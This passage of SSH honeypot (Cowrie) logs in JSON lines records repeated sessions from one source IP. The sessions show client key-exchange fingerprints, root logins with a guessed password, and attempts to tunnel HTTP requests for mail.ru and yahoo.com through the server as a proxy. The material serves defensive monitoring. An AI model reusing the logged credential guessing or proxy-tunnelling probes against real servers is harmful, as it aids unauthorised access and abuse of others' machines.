hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:54:16.551826Z","src_ip":"77.83.207.83","session":"390321ac5f57"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:54:16.800466Z","src_ip":"77.83.207.83","session":"390321ac5f57"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":21541,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:21541","sensor":"my-vps","timestamp":"2025-08-31T03:54:16.851753Z","session":"390321ac5f57"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:16.901773Z","src_ip":"77.83.207.83","session":"390321ac5f57"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":25958,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:25958","sensor":"my-vps","timestamp":"2025-08-31T03:54:17.044262Z","session":"390321ac5f57"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:17.094132Z","src_ip":"77.83.207.83","session":"390321ac5f57"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":22260,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:22260","sensor":"my-vps","timestamp":"2025-08-31T03:54:17.236215Z","session":"390321ac5f57"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:17.286365Z","src_ip":"77.83.207.83","session":"390321ac5f57"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:17.336773Z","src_ip":"77.83.207.83","session":"390321ac5f57"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":48880,"dst_ip":"1.2.3.4","dst_port":22,"session":"5aca395b80af","protocol":"ssh","message":"New connection: 77.83.207.83:48880 (1.2.3.4:22) [session: 5aca395b80af]","sensor":"my-vps","timestamp":"2025-08-31T03:54:17.386998Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:54:17.396012Z","src_ip":"77.83.207.83","session":"5aca395b80af"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:54:17.437886Z","src_ip":"77.83.207.83","session":"5aca395b80af"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:54:17.690770Z","src_ip":"77.83.207.83","session":"5aca395b80af"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":21926,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:21926","sensor":"my-vps","timestamp":"2025-08-31T03:54:17.742501Z","session":"5aca395b80af"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:17.793769Z","src_ip":"77.83.207.83","session":"5aca395b80af"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":3314,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:3314","sensor":"my-vps","timestamp":"2025-08-31T03:54:17.937434Z","session":"5aca395b80af"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:17.988819Z","src_ip":"77.83.207.83","session":"5aca395b80af"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":31339,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:31339","sensor":"my-vps","timestamp":"2025-08-31T03:54:18.133217Z","session":"5aca395b80af"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:18.184111Z","src_ip":"77.83.207.83","session":"5aca395b80af"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:18.236060Z","src_ip":"77.83.207.83","session":"5aca395b80af"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":48994,"dst_ip":"1.2.3.4","dst_port":22,"session":"c68e90ed0dcf","protocol":"ssh","message":"New connection: 77.83.207.83:48994 (1.2.3.4:22) [session: c68e90ed0dcf]","sensor":"my-vps","timestamp":"2025-08-31T03:54:18.285376Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:54:18.287251Z","src_ip":"77.83.207.83","session":"c68e90ed0dcf"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:54:18.338538Z","src_ip":"77.83.207.83","session":"c68e90ed0dcf"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:54:18.588688Z","src_ip":"77.83.207.83","session":"c68e90ed0dcf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":21065,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:21065","sensor":"my-vps","timestamp":"2025-08-31T03:54:18.639650Z","session":"c68e90ed0dcf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:18.689731Z","src_ip":"77.83.207.83","session":"c68e90ed0dcf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":9547,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:9547","sensor":"my-vps","timestamp":"2025-08-31T03:54:18.832805Z","session":"c68e90ed0dcf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:18.883072Z","src_ip":"77.83.207.83","session":"c68e90ed0dcf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":14946,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:14946","sensor":"my-vps","timestamp":"2025-08-31T03:54:19.024509Z","session":"c68e90ed0dcf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:19.075259Z","src_ip":"77.83.207.83","session":"c68e90ed0dcf"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:19.126377Z","src_ip":"77.83.207.83","session":"c68e90ed0dcf"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":49084,"dst_ip":"1.2.3.4","dst_port":22,"session":"e46f397496dd","protocol":"ssh","message":"New connection: 77.83.207.83:49084 (1.2.3.4:22) [session: e46f397496dd]","sensor":"my-vps","timestamp":"2025-08-31T03:54:19.175637Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:54:19.176495Z","src_ip":"77.83.207.83","session":"e46f397496dd"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:54:19.226727Z","src_ip":"77.83.207.83","session":"e46f397496dd"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:54:19.477293Z","src_ip":"77.83.207.83","session":"e46f397496dd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":25357,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:25357","sensor":"my-vps","timestamp":"2025-08-31T03:54:19.528712Z","session":"e46f397496dd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:19.579739Z","src_ip":"77.83.207.83","session":"e46f397496dd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":1877,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:1877","sensor":"my-vps","timestamp":"2025-08-31T03:54:19.720955Z","session":"e46f397496dd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:19.771150Z","src_ip":"77.83.207.83","session":"e46f397496dd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":20156,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:20156","sensor":"my-vps","timestamp":"2025-08-31T03:54:19.912687Z","session":"e46f397496dd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:19.963267Z","src_ip":"77.83.207.83","session":"e46f397496dd"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:20.014528Z","src_ip":"77.83.207.83","session":"e46f397496dd"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":49181,"dst_ip":"1.2.3.4","dst_port":22,"session":"cfcbcabfc0d1","protocol":"ssh","message":"New connection: 77.83.207.83:49181 (1.2.3.4:22) [session: cfcbcabfc0d1]","sensor":"my-vps","timestamp":"2025-08-31T03:54:20.063649Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:54:20.064660Z","src_ip":"77.83.207.83","session":"cfcbcabfc0d1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:54:20.115383Z","src_ip":"77.83.207.83","session":"cfcbcabfc0d1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:54:20.367132Z","src_ip":"77.83.207.83","session":"cfcbcabfc0d1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":13732,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:13732","sensor":"my-vps","timestamp":"2025-08-31T03:54:20.418480Z","session":"cfcbcabfc0d1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:20.469154Z","src_ip":"77.83.207.83","session":"cfcbcabfc0d1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":6906,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:6906","sensor":"my-vps","timestamp":"2025-08-31T03:54:20.612704Z","session":"cfcbcabfc0d1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:20.663107Z","src_ip":"77.83.207.83","session":"cfcbcabfc0d1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":28712,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:28712","sensor":"my-vps","timestamp":"2025-08-31T03:54:20.804879Z","session":"cfcbcabfc0d1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:20.855793Z","src_ip":"77.83.207.83","session":"cfcbcabfc0d1"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:20.906955Z","src_ip":"77.83.207.83","session":"cfcbcabfc0d1"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":49287,"dst_ip":"1.2.3.4","dst_port":22,"session":"efed02b18cf3","protocol":"ssh","message":"New connection: 77.83.207.83:49287 (1.2.3.4:22) [session: efed02b18cf3]","sensor":"my-vps","timestamp":"2025-08-31T03:54:20.956392Z"}
